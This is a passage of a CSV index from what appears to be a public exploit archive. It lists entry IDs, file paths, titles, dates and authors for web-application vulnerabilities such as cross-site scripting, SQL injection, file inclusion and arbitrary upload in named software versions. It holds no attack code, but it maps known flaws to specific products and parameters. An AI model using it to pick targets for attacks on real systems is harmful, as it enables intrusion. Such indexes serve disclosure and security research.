Scripting",2006-02-16,imei,php,webapps, -27243,exploits/php/webapps/27243.txt,"Siteframe Beaumont 5.0.1/5.0.2 - 'page.php' HTML Injection",2006-02-16,federico.alice@tiscali.it,php,webapps, -27245,exploits/php/webapps/27245.txt,"V-Webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-17,$um$id,php,webapps, -27247,exploits/php/webapps/27247.txt,"E107 Website System 0.7.2 Chatbox Plugin - HTML Injection",2006-02-18,"marc & shb",php,webapps, -27248,exploits/php/webapps/27248.txt,"Webpagecity WPC easy - SQL Injection",2006-02-18,murfie,php,webapps, -27249,exploits/php/webapps/27249.html,"PHP-Nuke 7.x - CAPTCHA Bypass",2006-02-18,waraxe,php,webapps, -27250,exploits/php/webapps/27250.txt,"TTS Software Time Tracking Software 3.0 - 'edituser.php' Access Validation",2006-02-20,"Aliaksandr Hartsuyeu",php,webapps, -27251,exploits/php/webapps/27251.txt,"Magic Calendar Lite 1.02 - 'index.php' SQL Injection",2006-02-20,"Aliaksandr Hartsuyeu",php,webapps, -27252,exploits/php/webapps/27252.txt,"CuteNews 1.4.1 - 'show_news.php' Cross-Site Scripting",2006-02-20,imei,php,webapps, -27254,exploits/php/webapps/27254.txt,"PostNuke 0.6x/0.7x NS-Languages Module - 'language' Cross-Site Scripting",2006-02-21,"Maksymilian Arciemowicz",php,webapps, -27255,exploits/php/webapps/27255.txt,"PostNuke 0.6x/0.7x NS-Languages Module - 'language' SQL Injection",2006-02-21,"Maksymilian Arciemowicz",php,webapps, -27256,exploits/php/webapps/27256.txt,"RunCMS 1.x - 'Ratefile.php' Cross-Site Scripting",2006-02-22,"Roozbeh Afrasiabi",php,webapps, -27259,exploits/php/webapps/27259.txt,"Noah's Classifieds 1.0/1.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,trueend5,php,webapps, -27260,exploits/php/webapps/27260.txt,"Noah's Classifieds 1.0/1.3 - Search Page SQL Injection",2006-02-22,trueend5,php,webapps, -27261,exploits/php/webapps/27261.txt,"Noah's Classifieds 1.0/1.3 - Local File Inclusion",2006-02-22,trueend5,php,webapps, -27262,exploits/php/webapps/27262.txt,"Noah's Classifieds 1.0/1.3 - 'index.php' Remote File Inclusion",2006-02-22,trueend5,php,webapps, -27263,exploits/php/webapps/27263.txt,"Dragonfly CMS 9.0.6 1 Your_Account Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,php,webapps, -27264,exploits/php/webapps/27264.txt,"Dragonfly CMS 9.0.6 1 News Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,php,webapps, -27265,exploits/php/webapps/27265.txt,"Dragonfly CMS 9.0.6.1 Stories_Archive Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,php,webapps, -27266,exploits/php/webapps/27266.txt,"Dragonfly CMS 9.0.6.1 Web_Links Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,php,webapps, -27267,exploits/php/webapps/27267.txt,"Dragonfly CMS 9.0.6.1 Surveys Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,php,webapps, -27268,exploits/php/webapps/27268.txt,"Dragonfly CMS 9.0.6.1 Downloads Module - 'c' Cross-Site Scripting",2006-02-22,Lostmon,php,webapps, -27269,exploits/php/webapps/27269.txt,"Dragonfly CMS 9.0.6.1 Coppermine Module - 'album' Cross-Site Scripting",2006-02-22,Lostmon,php,webapps, -27494,exploits/php/webapps/27494.txt,"phpMyFamily 1.4.1 - 'Track.php' Cross-Site Scripting",2006-03-28,matrix_killer,php,webapps, -27495,exploits/php/webapps/27495.txt,"PHPCOIN 1.2 - 'mod_print.php?fs' Cross-Site Scripting",2006-03-28,r0t,php,webapps, -27496,exploits/php/webapps/27496.txt,"PHPCOIN 1.2 - 'mod.php?fs' Cross-Site Scripting",2006-03-28,r0t,php,webapps, -27272,exploits/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps, -27274,exploits/php/webapps/27274.txt,"Ginkgo CMS - 'index.php?rang' SQL Injection",2013-08-02,Raw-x,php,webapps, -27275,exploits/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,cr4wl3r,php,webapps, -27276,exploits/php/webapps/27276.html,"BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps, -27279,exploits/php/webapps/27279.txt,"vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps, -27281,exploits/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - 'pages.php?page_name' SQL Injection",2013-08-02,"Anarchy Angel",php,webapps, -27283,exploits/hardware/webapps/27283.txt,"D-Link DIR-645 1.03B08 - Multiple Vulnerabilities",2013-08-02,"Roberto Paleari",hardware,webapps, -27284,exploits/hardware/webapps/27284.txt,"INSTEON Hub 2242-222 - Lack of Web and API Authentication",2013-08-02,"Trustwave's SpiderLabs",hardware,webapps, -27286,exploits/hardware/webapps/27286.txt,"MiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities",2013-08-02,"Trustwave's SpiderLabs",hardware,webapps, -27287,exploits/php/webapps/27287.txt,"Cotonti 0.9.13 - SQL Injection",2013-08-02,"High-Tech Bridge SA",php,webapps, -27288,exploits/hardware/webapps/27288.txt,"Western Digital My Net Wireless Routers - Password Disclosure",2013-08-02,"Kyle Lovett",hardware,webapps, -27289,exploits/hardware/webapps/27289.txt,"TP-Link TL-SC3171 IP Cameras - Multiple Vulnerabilities",2013-08-02,"Core Security",hardware,webapps, -27290,exploits/php/webapps/27290.txt,"WordPress Plugin Better WP Security - Persistent Cross-Site Scripting",2013-08-02,"Richard Warren",php,webapps, -27291,exploits/windows/webapps/27291.txt,"Oracle Hyperion 11 - Directory Traversal",2013-08-02,"Richard Warren",windows,webapps,19000 -27298,exploits/php/webapps/27298.txt,"Web Calendar Pro - 'Dropbase.php' SQL Injection",2006-02-23,ReZEN,php,webapps, -27299,exploits/php/webapps/27299.txt,"NOCC 1.0 - 'error.php?html_error_occurred' Cross-Site Scripting",2006-02-23,rgod,php,webapps, -27300,exploits/php/webapps/27300.txt,"NOCC 1.0 - 'filter_prefs.php?html_filter_select' Cross-Site Scripting",2006-02-23,rgod,php,webapps, -27301,exploits/php/webapps/27301.txt,"NOCC 1.0 - 'no_mail.php?html_no_mail' Cross-Site Scripting",2006-02-23,rgod,php,webapps, -27302,exploits/php/webapps/27302.txt,"NOCC 1.0 - 'html_bottom_table.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-23,rgod,php,webapps, -27303,exploits/php/webapps/27303.txt,"Oi! Email Marketing System 3.0 - 'index.php' SQL Injection",2006-02-23,h4cky0u,php,webapps, -27304,exploits/php/webapps/27304.html,"CubeCart 3.0.x - Arbitrary File Upload",2006-02-23,"NSA Group",php,webapps, -27305,exploits/php/webapps/27305.txt,"PHPX 3.5.9 - XCode Tag HTML Injection",2006-02-23,"Thomas Pollet",php,webapps, -27306,exploits/php/webapps/27306.txt,"JGS-Gallery 4.0 - 'jgs_galerie_slideshow.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-23,nuker,php,webapps, -27307,exploits/php/webapps/27307.txt,"JGS-Gallery 4.0 - 'Board jgs_galerie_scroll.php?userid' Cross-Site Scripting",2006-02-23,nuker,php,webapps, -27308,exploits/php/webapps/27308.txt,"myPHPNuke 1.8.8 - 'reviews.php' Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps, -27309,exploits/php/webapps/27309.txt,"myPHPNuke 1.8.8 - 'download.php' Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps, -27310,exploits/asp/webapps/27310.txt,"Battleaxe Software BttlxeForum 2.0 - 'Failure.asp' Cross-Site Scripting",2006-02-25,rUnViRuS,asp,webapps, -27311,exploits/php/webapps/27311.txt,"SPiD 1.3.1 - 'Scan_Lang_Insert.php' Local File Inclusion",2006-02-25,"NSA Group",php,webapps, -27312,exploits/php/webapps/27312.txt,"FreeHostShop Website Generator 3.3 - Arbitrary File Upload",2006-02-25,"NSA Group",php,webapps, -27313,exploits/php/webapps/27313.txt,"DCI-Taskeen 1.03 - 'basket.php' Multiple SQL Injections",2006-02-25,Linux_Drox,php,webapps, -27314,exploits/php/webapps/27314.txt,"DCI-Taskeen 1.03 - 'cat.php' Multiple SQL Injections",2006-02-25,Linux_Drox,php,webapps, -27315,exploits/php/webapps/27315.txt,"RiteCMS 1.0.0 - Multiple Vulnerabilities",2013-08-03,"Yashar shahinzadeh",php,webapps, -27318,exploits/php/webapps/27318.txt,"PHP-Nuke 7.8 - 'Mainfile.php' SQL Injection",2006-02-25,waraxe,php,webapps, -27320,exploits/hardware/webapps/27320.txt,"Thomson SpeedTouch 500 Series - LocalNetwork Page 'name' Cross-Site Scripting",2006-02-25,"Preben Nylokken",hardware,webapps, -27321,exploits/php/webapps/27321.txt,"Fantastic News 2.1.1 - SQL Injection",2006-02-27,SAUDI,php,webapps, -27322,exploits/php/webapps/27322.txt,"Woltlab Burning Board 1.1.1/2.x - 'galerie_index.php?Username' Cross-Site Scripting",2006-02-27,botan,php,webapps, -27323,exploits/php/webapps/27323.txt,"Woltlab Burning Board 1.1.1/2.x - 'galerie_onfly.php' Cross-Site Scripting",2006-02-27,botan,php,webapps, -27324,exploits/php/webapps/27324.txt,"Archangel Weblog 0.90.2 - Authentication Bypass",2006-02-27,KingOfSka,php,webapps, -27327,exploits/php/webapps/27327.txt,"D3Jeeb Pro 3 - 'fastlinks.php?catid' SQL Injection",2006-02-25,SAUDI,php,webapps, -27328,exploits/php/webapps/27328.txt,"D3Jeeb Pro 3 - 'catogary.php?catid' SQL Injection",2006-02-25,SAUDI,php,webapps, -27330,exploits/php/webapps/27330.txt,"n8cms 1.1/1.2 - 'index.php' Multiple SQL Injections",2006-02-27,Liz0ziM,php,webapps, -27331,exploits/php/webapps/27331.txt,"n8cms 1.1/1.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-27,Liz0ziM,php,webapps, -27332,exploits/php/webapps/27332.txt,"n8cms 1.1/1.2 - 'mailto.php?userid' Cross-Site Scripting",2006-02-27,Liz0ziM,php,webapps, -27333,exploits/php/webapps/27333.txt,"QwikiWiki 1.4 - 'index.php' Cross-Site Scripting",2006-02-28,Dr^Death,php,webapps, -27336,exploits/php/webapps/27336.txt,"EJ3 TOPo 2.2.178 - 'Inc_header.php' Cross-Site Scripting",2006-02-28,"Yunus Emre Yilmaz",php,webapps, -27337,exploits/php/webapps/27337.txt,"Mozilla Thunderbird 1.5 - Multiple Remote Information Disclosure Vulnerabilities",2006-02-28,Crashfr,php,webapps, -27338,exploits/php/webapps/27338.txt,"PEHEPE Membership Management System 3.0 - 'Sol_menu.php' Cross-Site Scripting",2006-02-26,"Yunus Emre Yilmaz",php,webapps, -27339,exploits/php/webapps/27339.txt,"PEHEPE Membership Management System 3.0 - Remote PHP Script Code Injection",2006-02-28,"Yunus Emre Yilmaz",php,webapps, -27340,exploits/php/webapps/27340.txt,"SMBlog 1.2 - Arbitrary PHP Command Execution",2006-03-01,botan,php,webapps, -27341,exploits/php/webapps/27341.txt,"DCI-Designs Dawaween 1.03 - 'Poems.php' SQL Injection",2006-03-02,sherba,php,webapps, -27342,exploits/php/webapps/27342.txt,"PluggedOut Nexus 0.1 - 'forgotten_password.php' SQL Injection",2006-03-02,"Hamid Ebadi",php,webapps, -27343,exploits/php/webapps/27343.txt,"vBulletin 3.0/3.5 - 'profile.php?Email' HTML Injection",2006-03-02,imei,php,webapps, -27344,exploits/php/webapps/27344.txt,"NZ eCommerce System - 'index.php' Multiple SQL Injections",2006-03-02,r0t,php,webapps, -27345,exploits/php/webapps/27345.txt,"LogIT 1.3/1.4 - Remote File Inclusion",2006-03-02,botan,php,webapps, -27346,exploits/php/webapps/27346.txt,"VBZoom Forum 1.11 - 'show.php' MainID SQL Injection",2006-03-04,Mr.SNAKE,php,webapps, -27347,exploits/php/webapps/27347.txt,"VBZooM Forum 1.11 - 'comment.php?UserID' Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps, -27348,exploits/php/webapps/27348.txt,"VBZooM Forum 1.11 - 'contact.php?UserID' Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps, -27354,exploits/php/webapps/27354.txt,"Easy Forum 2.5 - New User Image File HTML Injection",2006-03-04,"Aliaksandr Hartsuyeu",php,webapps, -27355,exploits/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 - 'misc.php' Cross-Site Scripting",2006-03-04,r57shell,php,webapps, -27362,exploits/php/webapps/27362.txt,"Bitweaver 1.1/1.2 - 'Title' HTML Injection",2006-03-06,Kiki,php,webapps, -27363,exploits/php/webapps/27363.txt,"PHORUM 3.x/5.x - 'Common.php' Remote File Inclusion",2006-03-06,ERNE,php,webapps, -27364,exploits/php/webapps/27364.txt,"Game-Panel 2.6 - 'login.php' Cross-Site Scripting",2006-03-06,Retard,php,webapps, -27557,exploits/php/webapps/27557.pl,"PHPSelect Submit-A-Link - HTML Injection",2006-04-01,s3rv3r_hack3r,php,webapps, -27367,exploits/php/webapps/27367.txt,"Link Bank - 'Iframe.php' Cross-Site Scripting",2006-03-07,Retard,php,webapps, -27368,exploits/php/webapps/27368.txt,"LoudBlog 0.41 - 'podcast.php' SQL Injection",2006-03-07,tzitaroth,php,webapps, -27369,exploits/php/webapps/27369.txt,"LoudBlog 0.41 - 'index.php?template' Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps, -27370,exploits/php/webapps/27370.txt,"LoudBlog 0.41 - 'backend_settings.php' Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps, -27371,exploits/php/webapps/27371.txt,"HitHost 1.0 - 'deleteuser.php?user' Cross-Site Scripting",2006-03-06,Retard,php,webapps, -27372,exploits/php/webapps/27372.txt,"HitHost 1.0 - 'viewuser.php?hits' Cross-Site Scripting",2006-03-06,Retard,php,webapps, -27373,exploits/php/webapps/27373.txt,"TextFileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,php,webapps, -27374,exploits/php/webapps/27374.txt,"sBlog 0.7.2 - 'search.php?keyword' POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps, -27375,exploits/php/webapps/27375.txt,"sBlog 0.7.2 - 'comments_do.php' Multiple POST Cross-Site Scripting Vulnerabilities",2006-03-09,Kiki,php,webapps, -27376,exploits/ios/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,ios,webapps, -27379,exploits/php/webapps/27379.txt,"ADP Forum 2.0.x - 'Subject' HTML Injection",2006-03-09,liz0,php,webapps, -27380,exploits/php/webapps/27380.txt,"MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps, -27381,exploits/php/webapps/27381.txt,"MyBloggie 2.1.2/2.1.3 - 'delcomment.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps, -27382,exploits/php/webapps/27382.txt,"MyBloggie 2.1.2/2.1.3 - 'deluser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps, -27383,exploits/php/webapps/27383.txt,"MyBloggie 2.1.2/2.1.3 - 'addcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps, -27384,exploits/php/webapps/27384.txt,"MyBloggie 2.1.2/2.1.3 - 'edituser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps, -27385,exploits/php/webapps/27385.txt,"MyBloggie 2.1.2/2.1.3 - 'adduser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps, -27386,exploits/php/webapps/27386.txt,"MyBloggie 2.1.2/2.1.3 - 'editcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps, -27387,exploits/php/webapps/27387.txt,"MyBloggie 2.1.2/2.1.3 - 'trackback_url' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps, -27388,exploits/php/webapps/27388.txt,"MyBloggie 2.1.2/2.1.3 - 'delcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps, -27389,exploits/php/webapps/27389.txt,"MyBloggie 2.1.2/2.1.3 - 'del.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps, -27390,exploits/php/webapps/27390.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps, -27391,exploits/php/webapps/27391.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'calendar.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps, -27392,exploits/php/webapps/27392.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'forums.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps, -27393,exploits/php/webapps/27393.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'inbox.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps, -27394,exploits/php/webapps/27394.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'lostpassword.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps, -27395,exploits/php/webapps/27395.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'mycontents.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps, -27396,exploits/php/webapps/27396.txt,"txtForum 1.0.3/1.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps, -27398,exploits/php/webapps/27398.txt,"Pluck CMS 4.7 - HTML Code Injection",2013-08-07,"Yashar shahinzadeh",php,webapps, -27399,exploits/php/webapps/27399.txt,"WordPress Plugin Booking Calendar 4.1.4 - Cross-Site Request Forgery",2013-08-07,"Dylan Irzi",php,webapps, -27402,exploits/hardware/webapps/27402.txt,"Hikvision IP Cameras 4.1.0 b130111 - Multiple Vulnerabilities",2013-08-07,"Core Security",hardware,webapps, -27403,exploits/php/webapps/27403.txt,"WordPress Plugin Usernoise 3.7.8 - Persistent Cross-Site Scripting",2013-08-07,RogueCoder,php,webapps, -27405,exploits/php/webapps/27405.txt,"Joomla! Component com_sectionex 2.5.96 - SQL Injection",2013-08-07,"Matias Fontanini",php,webapps, -27406,exploits/windows/webapps/27406.txt,"McAfee SuperScan 4.0 - Cross-Site Scripting",2013-08-07,"Trustwave's SpiderLabs",windows,webapps, -27408,exploits/php/webapps/27408.txt,"txtForum 1.0.3/1.0.4 - Remote PHP Script Code Injection",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps, -27409,exploits/php/webapps/27409.txt,"QwikiWiki 1.4/1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-10,Kiki,php,webapps, -27410,exploits/php/webapps/27410.txt,"QwikiWiki 1.4/1.5 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-10,Kiki,php,webapps, -27411,exploits/php/webapps/27411.txt,"QwikiWiki 1.4/1.5 - 'pageindex.php?help' Cross-Site Scripting",2006-03-10,Kiki,php,webapps, -27412,exploits/php/webapps/27412.txt,"QwikiWiki 1.4/1.5 - 'recentchanges.php?help' Cross-Site Scripting",2006-03-10,Kiki,php,webapps, -27413,exploits/php/webapps/27413.txt,"Core News 2.0.1 - 'index.php' Remote Code Execution",2006-03-10,botan,php,webapps, -27414,exploits/php/webapps/27414.txt,"vCard 2.8/2.9 - 'create.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Linux_Drox,php,webapps, -27415,exploits/php/webapps/27415.txt,"WMNews - 'wmview.php?ArtCat' Cross-Site Scripting",2006-03-10,R00T3RR0R,php,webapps, -27416,exploits/php/webapps/27416.txt,"WMNews - 'footer.php?ctrrowcol' Cross-Site Scripting",2006-03-10,R00T3RR0R,php,webapps, -27417,exploits/php/webapps/27417.txt,"WMNews - 'wmcomments.php?ArtID' Cross-Site Scripting",2006-03-10,R00T3RR0R,php,webapps, -27419,exploits/php/webapps/27419.txt,"Vegas Forum 1.0 - 'Forumlib.php' SQL Injection",2006-03-13,"Aliaksandr Hartsuyeu",php,webapps, -27422,exploits/php/webapps/27422.txt,"CyBoards PHP Lite 1.21/1.25 - 'post.php' SQL Injection",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps, -27423,exploits/php/webapps/27423.txt,"DSCounter 1.2 - 'index.php' SQL Injection",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps, -27424,exploits/php/webapps/27424.txt,"DSDownload 1.0 - Multiple SQL Injections",2006-03-15,"Aliaksandr Hartsuyeu",php,webapps, -27427,exploits/php/webapps/27427.txt,"Contrexx CMS 1.0.x - 'index.php' Cross-Site Scripting",2006-03-16,Soot,php,webapps, -27430,exploits/php/webapps/27430.txt,"PHPFox 3.6.0 (build3) - Multiple SQL Injections",2013-08-08,"Matias Fontanini",php,webapps, -27431,exploits/php/webapps/27431.txt,"BigTree CMS 4.0 RC2 - Multiple Vulnerabilities",2013-08-08,"High-Tech Bridge SA",php,webapps, -27991,exploits/php/webapps/27991.txt,"PostNuke 0.76 RC2 - Multiple Input Validation Vulnerabilities",2006-06-07,SpC-x,php,webapps, -27990,exploits/php/webapps/27990.txt,"Calendar Express 2.2 - 'month.php' SQL Injection",2006-06-07,"CrAzY CrAcKeR",php,webapps, -27443,exploits/php/webapps/27443.txt,"Extcalendar 1.0 - Cross-Site Scripting",2006-03-18,Soothackers,php,webapps, -27444,exploits/php/webapps/27444.txt,"Woltlab Burning Board 2.3.4 - 'Class_DB_MySQL.php' Cross-Site Scripting",2006-03-18,r57shell,php,webapps, -27445,exploits/php/webapps/27445.txt,"MusicBox 2.3 - 'index.php' SQL Injection",2006-03-18,Linux_Drox,php,webapps, -27446,exploits/php/webapps/27446.txt,"MusicBox 2.3 - 'index.php' Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps, -27447,exploits/php/webapps/27447.txt,"MusicBox 2.3 - 'cart.php' Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps, -27448,exploits/php/webapps/27448.txt,"phpWebSite 0.8.2/0.8.3 - 'friend.php?sid' SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps, -27449,exploits/php/webapps/27449.txt,"phpWebSite 0.8.2/0.8.3 - 'article.php?sid' SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps, -27450,exploits/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Directory Traversal",2006-02-24,raphael.huck@free.fr,php,webapps, -27451,exploits/cgi/webapps/27451.txt,"Verisign MPKI 6.0 - 'Haydn.exe' Cross-Site Scripting",2006-03-20,"Alberto Soli",cgi,webapps, -27454,exploits/php/webapps/27454.txt,"Motorola - BlueTooth Interface Dialog Spoofing",2006-03-22,kspecial,php,webapps, -27455,exploits/cfm/webapps/27455.txt,"1WebCalendar 4.0 - 'viewEvent.cfm?EventID' SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps, -27456,exploits/cfm/webapps/27456.txt,"1WebCalendar 4.0 - '/news/newsView.cfm?NewsID' SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps, -27457,exploits/cfm/webapps/27457.txt,"1WebCalendar 4.0 - 'mainCal.cfm' SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps, -27458,exploits/php/webapps/27458.txt,"EasyMoblog 0.5 - 'Img.php' Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps, -27459,exploits/php/webapps/27459.txt,"CoMoblog 1.0 - 'Img.php' Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps, -27462,exploits/php/webapps/27462.txt,"AdMan 1.0.20051221 - 'ViewStatement.php' SQL Injection",2003-03-23,r0t,php,webapps, -27463,exploits/jsp/webapps/27463.txt,"IBM Tivoli Business Systems Manager 3.1 - APWC_Win_Main.jsp Cross-Site Scripting",2006-03-23,anonymous,jsp,webapps, -27464,exploits/cgi/webapps/27464.txt,"Cholod MySQL Based Message Board - 'Mb.cgi' SQL Injection",2006-03-24,kspecial,cgi,webapps, -27465,exploits/php/webapps/27465.txt,"VihorDesign - 'index.php' Cross-Site Scripting",2006-03-24,botan,php,webapps, -27466,exploits/php/webapps/27466.txt,"VihorDesign - 'index.php' Remote File Inclusion",2006-03-24,botan,php,webapps, -27467,exploits/php/webapps/27467.txt,"ConfTool 1.1 - 'index.php' Cross-Site Scripting",2006-03-27,botan,php,webapps, -27468,exploits/php/webapps/27468.txt,"Nuked-klaN 1.x - 'index.php' SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps, -27469,exploits/asp/webapps/27469.txt,"EZHomePagePro 1.5 - 'email.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps, -27470,exploits/asp/webapps/27470.txt,"EZHomePagePro 1.5 - 'users_search.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps, -27471,exploits/asp/webapps/27471.txt,"EZHomePagePro 1.5 - 'users_calendar.asp?page' Cross-Site Scripting",2006-03-27,r0t,asp,webapps, -27472,exploits/asp/webapps/27472.txt,"EZHomePagePro 1.5 - 'users_profiles.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps, -27473,exploits/asp/webapps/27473.txt,"EZHomePagePro 1.5 - 'users_mgallery.asp?usid' Cross-Site Scripting",2006-03-27,r0t,asp,webapps, -27475,exploits/php/webapps/27475.txt,"SaPHPLesson 2.0 - 'print.php' SQL Injection",2006-03-27,Linux_Drox,php,webapps, -27477,exploits/php/webapps/27477.txt,"Maian Weblog 2.0 - 'print.php' SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps, -27478,exploits/php/webapps/27478.txt,"Maian Weblog 2.0 - 'mail.php' SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps, -27479,exploits/asp/webapps/27479.txt,"Toast Forums 1.6 - 'Toast.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps, -27480,exploits/asp/webapps/27480.txt,"Online Quiz System - 'prequiz.asp?exam' Cross-Site Scripting",2006-03-27,r0t,asp,webapps, -27481,exploits/asp/webapps/27481.txt,"Online Quiz System - 'student.asp?msg' Cross-Site Scripting",2006-03-27,r0t,asp,webapps, -27482,exploits/asp/webapps/27482.txt,"Caloris Planitia Technologies School Management System 1.0 - Cross-Site Scripting",2006-03-27,r0t,asp,webapps, -27483,exploits/php/webapps/27483.txt,"Pixel Motion - '/admin/index.php' Multiple SQL Injections",2006-03-27,DaBDouB-MoSiKaR,php,webapps, -27484,exploits/php/webapps/27484.txt,"Pixel Motion - 'index.php?date' SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps, -27485,exploits/php/webapps/27485.txt,"DSLogin 1.0 - 'index.php' Multiple SQL Injections",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps, -27486,exploits/asp/webapps/27486.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - 'domains.asp?txtDomainName' Cross-Site Scripting",2006-03-27,r0t,asp,webapps, -27487,exploits/asp/webapps/27487.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps, -27488,exploits/cgi/webapps/27488.txt,"BlankOL 1.0 - 'Bol.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,cgi,webapps, -27489,exploits/cfm/webapps/27489.txt,"FusionZONE CouponZONE 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,cfm,webapps, -27490,exploits/cfm/webapps/27490.txt,"ClassifiedZONE 1.2 - 'Accountlogon.cfm' Cross-Site Scripting",2006-03-28,r0t,cfm,webapps, -27491,exploits/cfm/webapps/27491.txt,"FusionZONE CouponZONE 4.2 - Multiple SQL Injections",2006-03-27,r0t,cfm,webapps, -27492,exploits/php/webapps/27492.txt,"ActiveCampaign SupportTrio 2.50.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,php,webapps, -27493,exploits/cfm/webapps/27493.txt,"RealestateZONE 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,cfm,webapps, -27497,exploits/php/webapps/27497.txt,"CONTROLzx Hms 3.3.4 - 'shared_order.php?sharedPlanID' Cross-Site Scripting",2006-03-28,r0t,php,webapps, -27498,exploits/php/webapps/27498.txt,"CONTROLzx Hms 3.3.4 - 'dedicated_order.php?dedicatedPlanID' Cross-Site Scripting",2006-03-28,r0t,php,webapps, -27499,exploits/php/webapps/27499.txt,"CONTROLzx Hms 3.3.4 - 'server_management.php?plan_id' Cross-Site Scripting",2006-03-28,r0t,php,webapps, -27500,exploits/php/webapps/27500.txt,"Arab Portal 2.0 - 'online.php' Cross-Site Scripting",2006-03-28,o.y.6,php,webapps, -27501,exploits/php/webapps/27501.txt,"Arab Portal 2.0 - 'download.php' Cross-Site Scripting",2006-03-28,o.y.6,php,webapps, -27502,exploits/php/webapps/27502.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewDay.html' Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,php,webapps, -27503,exploits/php/webapps/27503.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewSearch.html' Multiple Cross-Site Scripting 